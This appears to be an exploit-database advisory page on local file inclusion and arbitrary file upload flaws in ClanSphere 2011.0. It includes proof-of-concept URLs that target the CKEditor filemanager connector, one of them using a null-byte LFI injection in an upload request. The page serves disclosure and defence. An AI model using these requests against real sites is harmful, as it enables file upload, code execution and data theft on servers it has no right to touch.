header-logo
Suggest Exploit
vendor:
ClanSphere
by:
7.5
CVSS
HIGH
Local File Inclusion, Arbitrary File Upload
CWE
Product Name: ClanSphere
Affected Version From: ClanSphere 2011.0
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

ClanSphere Local File Inclusion and Arbitrary File Upload Vulnerabilities

ClanSphere is prone to a local file-include vulnerability and multiple arbitrary-file-upload vulnerabilities. An attacker can exploit these issues to upload arbitrary files onto the webserver, execute arbitrary local files within the context of the webserver, and obtain sensitive information.

Mitigation:

Patch or upgrade to a non-vulnerable version.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/47636/info

ClanSphere is prone to a local file-include vulnerability and multiple arbitrary-file-upload vulnerabilities.

An attacker can exploit these issues to upload arbitrary files onto the webserver, execute arbitrary local files within the context of the webserver, and obtain sensitive information.

ClanSphere 2011.0 is vulnerable; other versions may also be affected. 

http://www.example.com/[path]/mods/ckeditor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=[LFI]%00
http://www.example.com/[Path]/mods/ckeditor/filemanager/connectors/test.html
http://www.example.com/[Path]/mods/ckeditor/filemanager/connectors/uploadtest.html
http://www.example.com/[Path]/mods/ckeditor/filemanager/browser/default/browser.html
http://www.example.com/[Path]/mods/ckeditor/filemanager/browser/default/frmupload.html